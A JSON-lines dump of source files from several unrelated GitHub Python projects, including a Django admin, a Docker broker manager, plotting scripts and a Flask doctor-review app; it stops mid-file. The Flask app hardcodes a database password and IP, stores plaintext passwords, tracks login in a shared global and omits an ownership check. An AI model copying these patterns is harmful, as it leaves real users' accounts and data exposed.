('collapse',),\n 'fields': (\n ('tax_number', 'accounting_number'),\n ),\n 'description': 'Тут содержатся налоговые данные, необходимые для оформления документов ',\n }),\n )\n\n inlines = [\n PhoneInline,\n ]\n\n\nclass MyUserAdmin(admin.ModelAdmin):\n # fields = ('address', 'address_optional', 'country', 'city', 'zip', 'shipping_address_optional', 'shipping_address',\n # 'shipping_country', 'shipping_city', 'shipping_zip',)\n list_display = ('username', 'email', 'first_name', 'last_name', 'address',)\n\n\nadmin.site.site_header = 'Dropshipping (admin-panel)'\n\nadmin.site.register(Phone, PhoneAdmin)\nadmin.site.register(MyUser, MyUserAdmin)\nadmin.site.register(OrderDoc, OrderAdmin)\nadmin.site.register(WayBillDoc, WaybillAdmin)\nadmin.site.register(AcceptFPUnknownDoc, AcceptFPUnknownDocAdmin)\nadmin.site.register(InspectFPDoc, InspectFPDocAdmin)\nadmin.site.register(InspectProductDoc, InspectProductDocAdmin)\nadmin.site.register(WayBillStatus, WayBillStatusAdmin)\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(Currency, CurrencyAdmin)\nadmin.site.register(FreightPackingType, FreightPackingTypeAdmin)\nadmin.site.register(FPIdentified, FreightPackingAdmin)\nadmin.site.register(Company, ContractorAdmin)\nadmin.site.register(Warehouse, WarehouseAdmin)\nadmin.site.register(Customer, ContractorAdmin)\nadmin.site.register(Supplier, ContractorAdmin)\nadmin.site.register(Country, CountryAdmin)\nadmin.site.register(Unit, UnitAdmin)\nadmin.site.register([Config, ])\n","repo_name":"Nerimellx/Django-dropshipping","sub_path":"hellouser/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"42279885821","text":"from python_on_whales import DockerClient\nfrom components.exceptions import ComposeInitialization, UnknownBroker, Unimplemented\nfrom utils.file_utils import get_container_names_from_compose_file\n\n\nclass Compose:\n def __init__(self):\n self.brokers = {\n \"Lepus\": [\"./composes/lepus.yml\"],\n \"Orion-LD\": [\"./composes/orionld.yml\"],\n \"Stellio\": [\"./composes/stellio.yml\"],\n \"Scorpio\": [\"./composes/scorpio.yml\"],\n }\n self.container_names = { broker: get_container_names_from_compose_file(self.brokers[broker][0]) for broker in self.brokers.keys() }\n\n self.dockerEngine = None\n self.broker = None\n self.containers = list()\n\n def initialize(self, broker):\n try:\n self.broker = broker\n compose_files = self.brokers[broker]\n except KeyError:\n # The broker value send to the initialize process is not included in the valid values\n raise UnknownBroker(data=broker,\n message=f'Unknown Context Broker name. Valid values: {self.brokers.keys()}')\n\n # At the moment Scorpio and Stellio are not implemented, therefore we raise an exception Unimplemented\n if len(compose_files) == 0:\n raise Unimplemented(data=broker)\n\n self.dockerEngine = DockerClient(compose_files=compose_files,\n compose_env_file=\"./composes/.env\")\n\n def up(self):\n if self.dockerEngine is None:\n # Error, we need to call before the initialize operation to keep the broker and create the dockerEngine\n raise ComposeInitialization(data='')\n else:\n self.dockerEngine.compose.build()\n self.dockerEngine.compose.up(detach=\"True\")\n\n def down(self):\n if self.dockerEngine is None:\n # Error, we need to call before the initialize operation to keep the broker and create the dockerEngine\n raise ComposeInitialization(data='')\n else:\n self.dockerEngine.compose.down(volumes=\"True\")\n\n def check_health_status(self):\n \"\"\"\n When a container has a HealthCheck specified, it has a health status in addition to its normal status.\n A Docker container can have three health statuses:\n - starting: This takes up to 30 seconds to run, and represents the process of the container booting up\n - healthy: The container will continue to run its Health Check at every specified interval\n - unhealthy: After a certain number of consecutive failures the container's status will be unhealthy\n\n :return:\n \"\"\"\n if self.dockerEngine is None:\n # Error, we need to call before the initialize operation to keep the broker and create the dockerEngine\n raise ComposeInitialization(data='')\n else:\n status = self.dockerEngine.compose.ps(all=True)\n self.containers = [x.name for x in status if x.name in self.container_names[self.broker]]\n\n status = self.dockerEngine.container.inspect(self.containers)\n status = [{\"name\": x.name, \"health\": x.state.health.status if x.state.health is not None else \"unknown\", \"status\": x.state.status} for x in status]\n\n health_status = [x['health'] if 'health' in x else \"unknown\" for x in status]\n \n if True in [ele == \"unknown\" for ele in health_status]:\n res = \"unknown\"\n elif True in [ele == \"unhealthy\" for ele in health_status] or True in [ele == \"exited\" for ele in health_status]:\n res = \"unhealthy\"\n elif True in [ele == \"starting\" for ele in health_status]:\n res = \"starting\"\n else:\n res = \"healthy\"\n\n response = {\n \"status\": res,\n \"containers\": status\n }\n\n return response\n","repo_name":"flopezag/BrokerCleaner","sub_path":"components/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"16861018735","text":"#\n# Date 6th Aug 2020\n# Super() format differnt in py2.7 \n# Class code for experiment.\n#\n\nclass MyClass:\n\tx = 5\n\nclass Person:\n\tdef __init__(self, name, age):\n\t\tself.name = name\n\t\tself.age = age\n\n\tdef myfun(self):\n \tprint(\"Hello the Name is \" + self.name)\n\np1 = MyClass()\np2 = Person(\"Rav\", 22)\n\np2.myfun()\nprint(p2.name)\nprint(p2.age)\nprint(p1.x)\n\n#\n# Humman code for verification\n#\n\nclass Human():\n\tdef __init__(self, fname, lname):\n\t\tself.fname = fname\n\t\tself.lname = lname\n\n\nclass Freshman(Human):\n\tdef __init__(self, fname, lname, year):\n\t\tsuper(Freshman, self).__init__(fname, lname, year) # super format mistake\n\t\tself.year = year\n\n\tdef examl(self):\n\t\tprint(\"Exam for \", self.fname, self.lname, \"for ths year\")\n\n\nx = Freshman(\"Rav\", \"Holo\", \"2020\")\nx.examl()\t\t\n","repo_name":"amtdas/pybin","sub_path":"broken-class.py","file_name":"broken-class.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1679896140","text":"import csv\n\ndef raw_data_gen(n):\n '''\n generator for mock data\n\n\n yields str generators\n '''\n for i in range(n):\n yield (f'{i}_{j}' for j in range(4))\n\n\n#create/overwirte a file with rawdata\nwith open('data_file.csv', 'w', newline='') as data_buffer:\n file_writer = csv.writer(data_buffer)\n file_writer.writerows(raw_data_gen(5))\n\n\n#reads a file with rawdata and prints it\nwith open('data_file.csv', 'r', newline='') as data_buffer:\n file_reader = csv.reader(data_buffer)\n for row in file_reader:\n print(row)\n\n","repo_name":"katherinespiess/bcc_2020_2_prjsft2","sub_path":"2020-08-28 - aula02 - desenvolvimento hello world/csv_test.py","file_name":"csv_test.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73948106789","text":"# Reduce\n# Reduction -> Reduce\n# Reduce = Binary_function, sequence\nfrom functools import reduce\na = [1,2,3,4,5,6]\nb = reduce(lambda x,y:x*y,a)\nprint(b)\nb = reduce(lambda x,y:x*y,[1,2,3,4,5])\nprint('x*y result = ',b)\nb = reduce(lambda x,y:x+y,[1,2,3,4,5])\nprint('x+y result = ',b)\n\n","repo_name":"zamanwebdeveloper/OOP_in_Python","sub_path":"Python 3.8 Programming/ReduceWithLamda.py","file_name":"ReduceWithLamda.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"2253605798","text":"# Usual imports for plotting\r\n# import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\n\r\ndef plotSingleTP(data,label,marker,color):\r\n # Read in Latency Text files from various Locks and store in array. V\r\n directory = os.path.dirname(os.path.abspath(__file__))\r\n #text_files = [file_name for file_name in os.listdir(directory) if file_name.startswith(\"TPHighContention\")]\r\n data_file = data\r\n threads = []\r\n means = []\r\n stdDevs = []\r\n # for file_name in text_files:\r\n file_path = os.path.join(directory, data_file)\r\n with open(file_path, 'r') as file:\r\n lines = file.readlines()\r\n table_lines = lines[5:] # Discard the first 5 lines\r\n for line in table_lines:\r\n values = line.strip().split(',')\r\n if len(values) == 3:\r\n threads.append(float(values[0]))\r\n means.append(float(values[1]))\r\n stdDevs.append(float(values[2]))\r\n\r\n\r\n df = {\"Threads\": threads, \"Means\": means, \"stdDevs\": stdDevs}\r\n plt.plot(df[\"Threads\"], df[\"Means\"], label = label, marker = marker, color = color)\r\n plt.errorbar(df[\"Threads\"], df[\"Means\"], df[\"stdDevs\"], linestyle='None', marker=marker, capsize=2, color = color)\r\n\r\ndef plotLockTPHigh():\r\n # Get the current directory\r\n current_directory = os.path.dirname(os.path.abspath(__file__))\r\n # Get the parent directory\r\n parent_directory = os.path.dirname(current_directory)\r\n data_directory = os.path.join(parent_directory,\"data\",\"throughput\")\r\n data_files = [file_name for file_name in os.listdir(data_directory) if file_name.startswith(\"TPHighContention\")]\r\n markers = ['+', '.', '*', 'o', 'v', 'x','^','+']\r\n colors = ['red', \"pink\",'green', 'blue', 'yellow', \"black\", \"purple\",'grey']\r\n\r\n for data_file, marker, color in zip(data_files ,markers,colors):\r\n file_path = os.path.join(data_directory, data_file)\r\n lock_name = data_file.split('TPHighContention')[1].split('.txt')[0]\r\n plotSingleTP(data=file_path,label=lock_name, marker=marker, color=color)\r\n \r\n plt.xlabel(\"Threads\")\r\n plt.ylabel(\"Aggregate throughput rate: ops/sec\")\r\n plt.xscale(\"log\")\r\n plt.yscale(\"log\")\r\n plt.xticks([1,2,5,10,20,50,64],[1,2,5,10,20,50,64])\r\n plt.legend()\r\n plt.grid()\r\n plt.savefig(\"plots/TPHighContention.svg\")\r\n plt.show()\r\n\r\ndef plotLockTPLow():\r\n # Get the current directory\r\n current_directory = os.path.dirname(os.path.abspath(__file__))\r\n # Get the parent directory\r\n parent_directory = os.path.dirname(current_directory)\r\n data_directory = os.path.join(parent_directory,\"data\",\"throughput\")\r\n data_files = [file_name for file_name in os.listdir(data_directory) if file_name.startswith(\"TPLowContention\")]\r\n markers = ['+', '.', '*', 'o', 'v', 'x','^','+']\r\n colors = ['red', \"pink\",'green', 'blue', 'yellow', \"black\", \"purple\",\"grey\"]\r\n\r\n\r\n for data_file, marker, color in zip(data_files ,markers ,colors):\r\n file_path = os.path.join(data_directory, data_file)\r\n lock_name = data_file.split('TPLowContention')[1].split('.txt')[0]\r\n plotSingleTP(data=file_path,label=lock_name, marker=marker,color=color)\r\n plt.xlabel(\"Threads\")\r\n plt.ylabel(\"Aggregate throughput rate: ops/sec\")\r\n plt.xscale(\"log\")\r\n #plt.yscale(\"log\")\r\n plt.xticks([1,2,5,10,20,50,64],[1,2,5,10,20,50,64])\r\n plt.legend()\r\n plt.grid()\r\n plt.show()\r\n plt.savefig(\"plots/TPLowContention.svg\")\r\n \r\n\r\n\r\nif __name__ == \"__main__\": \r\n if sys.argv[1] == \"high\":\r\n plt.figure(figsize=(10,6))\r\n plotLockTPHigh()\r\n\r\n if sys.argv[1] == \"low\":\r\n plt.figure(figsize=(10,6))\r\n plotLockTPLow()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"simon-koenig/Hardware-Locks","sub_path":"src/plotTP.py","file_name":"plotTP.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26880585571","text":"import hashlib\nimport json\nfrom csv import DictWriter\nfrom datetime import datetime\nfrom io import BytesIO, StringIO\n\nfrom flask import send_file\nfrom flask.json import jsonify\nfrom flask_restful import Resource, marshal, reqparse\n\nfrom app import auth\nfrom app.utils.report import ReportGenerator\nfrom app.utils.schema import ReportSchema\n\n\nclass BaseReportResource(Resource):\n \"\"\"This is base class for Report Generation routes\n \"\"\"\n decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('group_by',\n type=str,\n action='append',\n choices=('year', 'agency', 'product_line'),\n required=True)\n self.reqparse.add_argument('start_year', type=str, required=True)\n self.reqparse.add_argument('end_year', type=str, required=True)\n self.reqparse.add_argument('aggregation',\n type=str,\n required=False,\n default='sum',\n choices=('mean', 'sum'))\n self.reqparse.add_argument('agency', type=str, required=False)\n self.reqparse.add_argument('product_line', type=str, required=False)\n super(BaseReportResource, self).__init__()\n\n\nclass ReportResource(BaseReportResource):\n def get(self):\n \"\"\"Generates reports based on parameters\n\n .. :quickref: Generate report\n\n **Example request**:\n\n .. http:example:: curl wget httpie python-requests\n\n GET /api/v1/report/ HTTP/1.1\n Host: britecore-assignment.herokuapp.com\n Accept: application/json\n Authorization: Basic YWRtaW46YWRtaW4=\n\n :query group_by: year\n :query start_year: 2005\n :query end_year: 2007 \n\n :query string group_by: Columns by which group by is to perform. One of ``year``, ``ageny``, ``hit``, ``product_line``\n :query string start_year: Start year of date range\n :query string end_year: End year of date range\n :query string aggregation: Aggregation function to use. One of ``sum``, ``mean``. Default is ``sum``. Optional\n :query string agency: Agency Id to consider data only specific to that agency. Optional\n :query string product_line: Product Line to consider data only specific to that product line. Optional\n \n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Vary: Accept\n Content-Type: application/json\n\n {\n \"data\": [\n {\n \"agency\": null,\n \"earned_premium\": 274675017.4599997,\n \"incurred_losses\": 117393349.14999987,\n \"mean_loss_ratio\": 1285.3961976702374,\n \"mean_retention_ratio\": 0.3373681922621354,\n \"new_business_in_written_premium\": 33192077.359999966,\n \"policy_inforce_quantity\": 2824264,\n \"product_line\": null,\n \"retention_policy_quantity\": 2485771,\n \"total_written_premium\": 274320178.95000064,\n \"year\": \"2005\"\n },\n {\n \"agency\": null,\n \"earned_premium\": 410581483.9599992,\n \"incurred_losses\": 215616372.25999993,\n \"mean_loss_ratio\": 910.8174490424989,\n \"mean_retention_ratio\": 0.317405557905061,\n \"new_business_in_written_premium\": 53898372.57000006,\n \"policy_inforce_quantity\": 4223340,\n \"product_line\": null,\n \"retention_policy_quantity\": 3708433,\n \"total_written_premium\": 412880799.3700002,\n \"year\": \"2006\"\n },\n {\n \"agency\": null,\n \"earned_premium\": 408430805.0600007,\n \"incurred_losses\": 232238370.9800001,\n \"mean_loss_ratio\": 804.9616474706926,\n \"mean_retention_ratio\": 0.3063852120589169,\n \"new_business_in_written_premium\": 44707526.20999996,\n \"policy_inforce_quantity\": 4125077,\n \"product_line\": null,\n \"retention_policy_quantity\": 3687600,\n \"total_written_premium\": 408545579.0100004,\n \"year\": \"2007\"\n }\n ],\n \"message\": null,\n \"status\": \"success\"\n }\n\n :resheader Content-Type: application/json\n :statuscode 200: Everything works fine and returns report based on given date range\n :statuscode 400: Invalid request\n\n \"\"\"\n args = self.reqparse.parse_args()\n\n report = ReportGenerator(args)\n df = report.generate()\n\n response = {\n 'data': marshal(df.to_dict('records'), ReportSchema),\n 'status': 'success',\n 'message': None\n }\n return jsonify(response)\n\n\nclass CSVReportResource(BaseReportResource):\n def get(self):\n \"\"\"Generate CSV report with premium information\n\n .. :quickref: Generate CSV report\n\n **Example request**:\n\n .. http:example:: curl wget httpie python-requests\n\n GET /api/v1/report/csv HTTP/1.1\n Host: britecore-assignment.herokuapp.com\n Accept: text/csv\n Authorization: Basic YWRtaW46YWRtaW4=\n\n :query group_by: year\n :query start_year: 2005\n :query end_year: 2007 \n\n :query string group_by: Columns by which group by is to perform. One of ``year``, ``ageny``, ``hit``, ``product_line``\n :query string start_year: Start year of date range\n :query string end_year: End year of date range\n :query string aggregation: Aggregation function to use. One of ``sum``, ``mean``. Default is ``sum``. Optional\n :query string agency: Agency Id to consider data only specific to that agency. Optional\n :query string product_line: Product Line to consider data only specific to that product line. Optional\n \n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Vary: Accept\n Content-Type: text/csv\n\n 2005,2485771,2824264,33192077.359999966,274320178.95000064,274675017.4599997,117393349.14999987,0.3373681922621354,1285.3961976702374\n 2006,3708433,4223340,53898372.57000006,412880799.3700002,410581483.9599992,215616372.25999993,0.317405557905061,910.8174490424989\n 2007,3687600,4125077,44707526.20999996,408545579.0100004,408430805.0600007,232238370.9800001,0.3063852120589169,804.9616474706926\n\n :resheader Content-Type: text/csv\n :statuscode 200: Everything works fine and returns report based on given date range\n :statuscode 400: Invalid request\n\n \"\"\"\n args = self.reqparse.parse_args()\n\n report = ReportGenerator(args)\n df = report.generate()\n\n request_params = {k: v for k, v in args.items() if v}\n generate_date = datetime.utcnow().strftime('%Y%m%d')\n\n filename = \"report_{unique_hash}_{generate_date}.csv\".format(\n unique_hash=hashlib.md5(\n json.dumps(request_params).encode('utf-8')).hexdigest(),\n generate_date=generate_date)\n\n buffer = StringIO()\n writer = DictWriter(buffer, df.columns, delimiter=',')\n writer.writeheader()\n for row in df.to_dict('records'):\n writer.writerow(row)\n\n buffer.seek(0)\n buffer = BytesIO(buffer.read().encode('utf-8'))\n mimetype = 'Content-Type: text/csv; charset=utf-8'\n\n return send_file(buffer,\n attachment_filename=filename,\n as_attachment=True,\n mimetype=mimetype)\n","repo_name":"mhetrerajat/britecore_assignment","sub_path":"app/resources/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":8160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"69979099750","text":"\"\"\"\nTo run locally:\n virtual machine: source virtual/bin/activate\n python3 app.py --debug\nGo to http://localhost:8111 in your browser.\n\nAfter cloning, make virtual env\nsource virtual/bin/activate\nexport FLASK_ENV=development\nexport FLASK_APP=app.py\nPip install flask\npip install Flask-SQLAlchemy\npip3 install Flask-WTF\nTo fix psycopg2 error:\nsudo pip3 install psycopg2-binary\npip install psycopg2-binary --user\n\nTips: If you get a NoType error, just delete your cookies\n\"\"\"\n\nimport os\nfrom sqlalchemy import *\nfrom sqlalchemy.pool import NullPool\nfrom flask import Flask, request, render_template, g, redirect, Response, flash, url_for, session\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField, IntegerField, DateField, TextAreaField, TimeField\nfrom wtforms.validators import DataRequired, NumberRange\nfrom wtforms.widgets import TextArea\n\n# Create a Flask Instance\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'databases'\n\nDATABASEURI = \"postgresql://aj2604:316@34.75.94.195/proj1part2\"\nengine = create_engine(DATABASEURI)\n\ncurrent_user = None\n\n# Create a Form Class\n\nclass LoginForm(FlaskForm):\n uni = StringField(\"UNI\", validators=[DataRequired()])\n password = PasswordField(\"Password\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass NewUserForm(FlaskForm):\n first_name = StringField(\"First Name\", validators=[DataRequired()])\n last_name = StringField(\"Last Name\", validators=[DataRequired()])\n uni = StringField(\"UNI\", validators=[DataRequired()])\n password = PasswordField(\"Password\", validators=[DataRequired()])\n age = IntegerField(\"Age\", validators=[DataRequired()])\n school = StringField(\"School\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass EditUserForm(FlaskForm):\n first_name = StringField(\"First Name\", validators=[DataRequired()])\n last_name = StringField(\"Last Name\", validators=[DataRequired()])\n # uni = StringField(\"UNI\", validators=[DataRequired()])\n # password = PasswordField(\"Password\", validators=[DataRequired()])\n age = IntegerField(\"Age\", validators=[DataRequired()])\n school = StringField(\"School\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass NewReviewForm(FlaskForm):\n date_of_visit = DateField(\"Date of Visit\", validators=[DataRequired()])\n rating = IntegerField(\"Rating\", validators=[DataRequired(), NumberRange(min=1, max=5)])\n content = TextAreaField(\"Review Content\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass EditReviewForm(FlaskForm):\n date_of_visit = DateField(\"Date of Visit\", validators=[DataRequired()])\n rating = IntegerField(\"Rating\", validators=[DataRequired(), NumberRange(min=1, max=5)])\n content = TextAreaField(\"Review Content\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass NewAptForm(FlaskForm):\n apt_date = DateField(\"Date of Appointment\", validators=[DataRequired()])\n apt_time = TimeField(\"Time of Appointment\", validators=[DataRequired()])\n concern_description = TextAreaField(\"Concern Description\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass EditAptForm(FlaskForm):\n apt_date = DateField(\"Date of Appointment\", validators=[DataRequired()])\n apt_time = TimeField(\"Time of Appointment\", validators=[DataRequired()])\n concern_description = TextAreaField(\"Concern Description\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass SearchForm(FlaskForm):\n searched = StringField(\"Searched\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\n\n# Runs at beginning of every web request; sets up db connection\n@app.before_request\ndef before_request():\n try:\n g.conn = engine.connect()\n g.user = current_user\n\n except:\n print(\"uh oh, problem connecting to database\")\n import traceback; traceback.print_exc()\n g.conn = None\n\n# Runs at end of every web request; closes the database connection\n# If you don't, the database could run out of memory\n@app.teardown_request\ndef teardown_request(exception):\n try:\n g.user = current_user\n g.conn.close()\n except Exception as e:\n pass\n\n# ROUTES\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/doctors')\ndef doctors():\n cursor = g.conn.execute(\"SELECT * FROM doctors\")\n all_doctors = []\n for result in cursor:\n all_doctors.append(result)\n cursor.close()\n context = dict(data = all_doctors)\n\n return render_template(\"doctors.html\", **context)\n\n@app.route('/doctors/')\ndef doctor(npi):\n cursor = g.conn.execute(\"SELECT * FROM doctors\")\n doctor_info = []\n for result in cursor:\n if result['npi'] == npi:\n doctor_info.append(result)\n cursor.close()\n\n cursor = g.conn.execute(\"SELECT * FROM doctors AS D, writes AS W, reviews AS R WHERE D.npi = W.npi AND W.review_id=R.review_id\")\n doctor_reviews = []\n for result in cursor:\n if result['npi'] == npi:\n doctor_reviews.append(result)\n cursor.close()\n\n # Check if doctor is saved by current user\n cursor = g.conn.execute(\"SELECT * FROM saves AS S WHERE S.npi=%s AND S.uni=%s\", npi, current_user)\n saved = cursor.fetchone()\n cursor.close()\n \n context = dict(info = doctor_info[0], reviews = doctor_reviews, saved=saved)\n return render_template(\"doctor.html\", **context)\n\n@app.route('/users')\ndef users():\n cursor = g.conn.execute(\"SELECT * FROM studentPatients\")\n all_users = []\n for result in cursor:\n all_users.append(result)\n cursor.close()\n context = dict(data = all_users)\n return render_template(\"users.html\", **context)\n\n@app.route('/users/')\ndef user(uni):\n\n if not current_user or g.user != uni:\n flash(\"You do not have access to other students' profiles\")\n return redirect(url_for('users'))\n\n # Get only user information\n cursor = g.conn.execute(\"SELECT * FROM studentPatients\")\n user_info = []\n for result in cursor:\n if result['uni'] == uni:\n user_info.append(result)\n cursor.close()\n \n # Get specific user + saved doctors\n cursor = g.conn.execute(\"SELECT * FROM studentPatients AS S, saves AS V, doctors AS D WHERE S.uni = V.uni AND D.npi=V.npi\")\n saved_doctors = []\n for result in cursor:\n if result['uni'] == uni:\n saved_doctors.append(result)\n cursor.close()\n\n # Get specific user + reviews\n cursor = g.conn.execute(\"SELECT * FROM studentPatients AS S, writes AS W, reviews AS R WHERE S.uni = W.uni AND W.review_id=R.review_id\")\n user_revs = []\n for result in cursor:\n if result['uni'] == uni:\n user_revs.append(result)\n cursor.close()\n \n # Get specific user + appointments\n cursor = g.conn.execute(\"SELECT * FROM hospitals AS Q, studentPatients AS S, doctors AS D, appointments AS A, schedules AS H WHERE Q.cms = H.cms AND S.uni = H.uni AND D.npi = H.npi AND A.apt_id=H.apt_id\")\n user_apts = []\n for result in cursor:\n if result['uni'] == uni:\n user_apts.append(result)\n cursor.close()\n\n context = dict(info = user_info[0], saved = saved_doctors, reviews = user_revs, appointments = user_apts)\n return render_template(\"user.html\", **context)\n\n@app.route('/newUser', methods=['GET','POST'])\ndef newUser():\n first_name = None\n last_name = None\n uni = None\n password = None\n age = None\n school = None\n form = NewUserForm()\n if form.validate_on_submit():\n # Grab information\n first_name = form.first_name.data\n last_name = form.last_name.data\n uni = form.uni.data\n password = form.password.data\n age = form.age.data\n school = form.school.data\n # Set fields empty again\n form.first_name.data = ''\n form.last_name.data = ''\n form.uni.data = ''\n form.password.data = ''\n form.age.data = ''\n form.school.data = ''\n \n # Push to database\n args = (first_name, last_name, uni, password, age, school)\n g.conn.execute(\"INSERT INTO studentpatients VALUES (%s, %s, %s, %s, %s, %s)\", args)\n global current_user\n current_user = uni\n g.user = current_user\n return redirect(\"/users/\" + current_user)\n\n return render_template(\"newUser.html\", \n first_name=first_name,\n last_name = last_name,\n uni = uni,\n password = password,\n age = age,\n school = school,\n form=form)\n\n@app.route('/users//edit', methods=['GET','POST'])\ndef editUser(uni):\n\n # Get this user's information\n cursor = g.conn.execute(\"SELECT * FROM studentPatients\")\n user_info = []\n for result in cursor:\n if result['uni'] == uni:\n user_info.append(result)\n cursor.close()\n user = user_info[0]\n\n # Populate form with current information\n form = EditUserForm(request.form, obj = user)\n\n if form.validate_on_submit():\n # Grab new information\n first_name = form.first_name.data\n last_name = form.last_name.data\n age = form.age.data\n school = form.school.data\n\n # Set fields empty again\n form.first_name.data = ''\n form.last_name.data = ''\n form.age.data = ''\n form.school.data = ''\n \n # Push edits to database\n g.conn.execute(\"UPDATE studentpatients SET first_name=%s, last_name=%s, age=%s, school=%s WHERE uni=%s\", first_name, last_name, age, school, uni)\n\n flash(\"Profile Information Updated Successfully\")\n global current_user\n current_user = uni\n g.user = current_user\n return redirect(\"/users/\" + current_user)\n\n return render_template(\"editUser.html\", form=form)\n\n@app.route('/users//delete', methods=['GET','DELETE'])\ndef deleteUser(uni):\n # Push delete to database\n g.conn.execute(\"DELETE FROM studentpatients WHERE uni=%s\", uni)\n\n flash(\"Profile Deleted\")\n global current_user\n current_user = None\n return redirect('/login')\n\n@app.route('/reviews/')\ndef review(review_id):\n\n # Find the student who wrote the review\n cursor = g.conn.execute(\"SELECT uni FROM writes WHERE review_id=%s\", review_id)\n writer = cursor.fetchone()\n cursor.close()\n\n # Get review information\n cursor = g.conn.execute(\"SELECT * FROM doctors AS D, writes AS W, reviews AS R WHERE D.npi = W.npi AND W.review_id=R.review_id\")\n review_result = []\n for result in cursor:\n if result['review_id'] == int(review_id):\n review_result.append(result)\n cursor.close()\n context = dict(data = review_result[0], writer = writer[0])\n\n return render_template(\"review.html\", **context)\n\n@app.route('/newReview/', methods=['POST', 'GET'])\ndef newReview(npi):\n\n if not current_user:\n flash(\"Please login to leave a review\")\n return redirect(\"/login\")\n\n date_of_visit = None\n rating = None\n content = None\n\n form = NewReviewForm()\n if form.validate_on_submit():\n date_of_visit = form.date_of_visit.data\n rating = form.rating.data\n content = form.content.data\n\n form.date_of_visit.data = ''\n form.rating.data = ''\n form.content.data = ''\n\n # Get new review id\n review_id = str(add_to_review_count())\n\n args_review = (review_id, date_of_visit, content, rating)\n g.conn.execute(\"INSERT INTO reviews VALUES (%s, %s, %s, %s)\", args_review)\n\n date_written = datetime.now()\n args_writes = (npi, current_user, review_id, date_written)\n g.conn.execute(\"INSERT INTO writes VALUES (%s, %s, %s, %s)\", args_writes)\n\n return redirect(\"/reviews/\" + review_id)\n\n return render_template(\"newReview.html\",\n date_of_visit = date_of_visit,\n rating = rating,\n content = content,\n form=form)\n\ndef add_to_review_count():\n cursor = g.conn.execute(\"SELECT max(review_id) FROM reviews\")\n count = cursor.fetchone()[0] + 1\n cursor.close()\n return count\n\n@app.route('/reviews//edit', methods=['POST', 'GET'])\ndef editReview(review_id):\n\n if not current_user:\n flash(\"Please login to edit your review\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM writes WHERE review_id=%s AND uni=%s\", review_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to edit other students' reviews\")\n return redirect(\"/users/\" + current_user)\n\n # Get this review's information\n cursor = g.conn.execute(\"SELECT * FROM reviews WHERE review_id=%s\", review_id)\n review = cursor.fetchone()\n # cursor.close() <<<<<<<<<<<<<< Do I need this?\n\n # Populate form with current information\n form = EditReviewForm(request.form, obj = review)\n\n if form.validate_on_submit():\n # Grab new information\n date_of_visit = form.date_of_visit.data\n rating = form.rating.data\n content = form.content.data\n\n # Set fields empty again\n form.date_of_visit.data = ''\n form.rating.data = ''\n form.content.data = ''\n \n # Push edits to database\n g.conn.execute(\"UPDATE reviews SET date_of_visit=%s, rating=%s, content=%s WHERE review_id=%s\", date_of_visit, rating, content, review_id)\n\n return redirect(\"/reviews/\" + str(review['review_id']))\n\n return render_template(\"editReview.html\", form=form)\n\n@app.route('/reviews//delete', methods=['GET','DELETE'])\ndef deleteReview(review_id):\n\n if not current_user:\n flash(\"Please login to delete your review\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM writes WHERE review_id=%s AND uni=%s\", review_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to delete other students' reviews\")\n return redirect(\"/users/\" + current_user)\n\n\n # Push delete to database\n g.conn.execute(\"DELETE FROM writes WHERE review_id=%s\", review_id)\n g.conn.execute(\"DELETE FROM reviews WHERE review_id=%s\", review_id)\n\n flash(\"Review Deleted\")\n return redirect(\"/users/\" + current_user)\n\n@app.route('/login', methods=['GET','POST'])\ndef login():\n form = LoginForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n # Find correct user\n cursor = g.conn.execute(\"SELECT * FROM studentpatients\")\n users = []\n for result in cursor:\n if result['uni'] == form.uni.data:\n users.append(result)\n cursor.close()\n \n if users:\n user = users[0]\n # Password verification\n if(form.password.data == user['password']):\n global current_user \n current_user = user.uni\n url = 'users/' + str(user.uni)\n return redirect(url)\n else:\n flash(\"Wrong Password\")\n else:\n flash(\"User does not exist\")\n return render_template(\"login.html\", 